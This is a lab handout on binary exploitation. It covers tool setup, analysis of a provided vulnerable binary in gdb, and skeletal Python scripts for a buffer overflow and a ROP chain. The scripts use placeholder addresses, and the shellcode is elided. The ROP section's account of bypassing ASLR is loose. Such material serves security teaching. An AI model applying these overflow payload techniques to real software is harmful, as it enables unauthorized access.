Exploit Development & Binary Exploitation Lab
Overview
This lab focuses on offensive security techniques involving binary exploitation and exploit development. Students will learn how to analyze vulnerable binaries, manipulate memory, and craft custom exploits to gain unauthorized access.
What You Will Learn
- Understanding memory corruption vulnerabilities (buffer overflows, format string exploits, heap exploitation)
- Using debuggers to analyze binary behavior
- Writing custom exploits in Python
- Bypassing security protections like ASLR and DEP
Lab Instructions
1. Setting Up Your Environment
You will need:
- A Debian or Kali Linux VM (VirtualBox, WSL, or cloud-based instance)
- Python3 installed (sudo apt update && sudo apt install python3)
- Exploitation tools: gdb, pwntools, radare2, gef, ROPgadget
Install required tools:
sudo apt install gdb gdb-multiarch python3-pwntools radare2 ropgadget
2. Identifying Vulnerabilities in a Binary
Step 1: Download the vulnerable binary
wget https://example.com/vuln_binary -O vuln_binary
chmod +x vuln_binary
Step 2: Analyze the binary
gdb -q vuln_binary
checksec vuln_binary # Check security protections
run # Execute the binary and observe behavior
3. Exploiting a Buffer Overflow
Step 1: Fuzzing Input to Find Overflow Point
#!/usr/bin/python3
import sys
import struct
offset = 100 # Modify based on test results
payload = b"A" * offset + struct.pack("<I", 0xdeadbeef) # Overwrite return address
sys.stdout.buffer.write(payload)
Save as exploit.py and run:
python3 exploit.py | ./vuln_binary
4. Bypassing ASLR with ROP Chains
Step 1: Generate a ROP chain
ROPgadget --binary vuln_binary --only "pop|ret"
Step 2: Modify exploit to include ROP gadgets
import sys
import struct
pop_ret = struct.pack("<I", 0x08048484) # Example gadget address
shellcode = b"\x90" * 16 + b"..." # Inject shellcode
payload = b"A" * 100 + pop_ret + shellcode
sys.stdout.buffer.write(payload)
Run again:
python3 exploit.py | ./vuln_binary
Final Submission
- Submit a Google Doc with screenshots of your completed tasks.
- Ensure each screenshot has a caption explaining what was accomplished.
- Follow submission guidelines as provided by your instructor.
Congratulations! You’ve completed the Exploit Development & Binary Exploitation Lab!